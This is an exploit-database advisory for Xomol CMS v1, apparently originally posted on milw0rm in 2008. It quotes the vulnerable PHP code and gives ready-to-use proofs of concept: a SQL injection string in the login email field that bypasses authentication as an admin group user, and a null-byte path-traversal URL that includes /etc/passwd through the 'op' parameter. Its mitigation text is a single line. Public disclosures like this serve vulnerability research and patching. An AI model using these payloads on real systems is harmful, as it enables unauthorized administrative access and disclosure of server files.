Xomol CMS v1 Login Bypass & LFI

vendor:

Xomol CMS

by:

DNX

7.5

CVSS

HIGH

CWE

Product Name: Xomol CMS

Affected Version From: v1

Affected Version To: v1

Patch Exists: YES

Related CWE: N/A

CPE: a:xomol:xomol_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Xomol CMS v1 Login Bypass & LFI

Xomol CMS is a content management system based on PHP and MySQL. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'email' and 'password' parameters of the 'index.php' script, which can be exploited to bypass authentication and gain administrative access. Additionally, the vulnerability is caused due to insufficient sanitization of user-supplied input in the 'op' parameter of the 'index.php' script, which can be exploited to include arbitrary files from local resources. This can be exploited to disclose sensitive information.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to bypass authentication or to include arbitrary files from local resources.

Source

Exploit-DB raw data:

                     \#'#/
                     (-.-)
   -------------oOO---(_)---OOo------------
   |    Xomol CMS v1 Login Bypass & LFI   |
   |             coded by DNX             |
   ----------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.xomol.net
[!] Detected...: 12.05.2008
[!] Reported...: 13.05.2008 (didn't work: host mail.xomol.net said: 554 5.7.1 - Relay access denied)
[!] Response...: xx.xx.2008

[!] Background.: Xomol CMS is a content management system based on PHP and MySQL

[!] Bug Bypass.: $_POST['email'] and $_POST['password'] in index.php near line 59

                 58: if(!empty($_POST['email'])&&!empty($_POST['password'])){
                 59:      $sql='SELECT user_id FROM users WHERE user_email="'.$_POST['email'].'"  AND  user_password="'.md5($_POST['password']).'" AND user_status=1';
                 60:      $result = sql_query($sql, $dbi);

[!] Bug LFI....: $op in index.php near line 272

                 234: switch($op){

                 270:     default:
                 271:     if (file_exists('modules/'.$op.'/index.php')) {
                 272:         include('modules/'.$op.'/index.php');

[!] PoC Bypass.: Login with email: " OR user_group=1/*"" and password: not empty
                 (works only with magic_quotes_gpc = off)

[!] PoC LFI....: http://127.0.0.1/xomol/index.php?op=../../../../../../../../../../etc/passwd%00

# milw0rm.com [2008-05-25]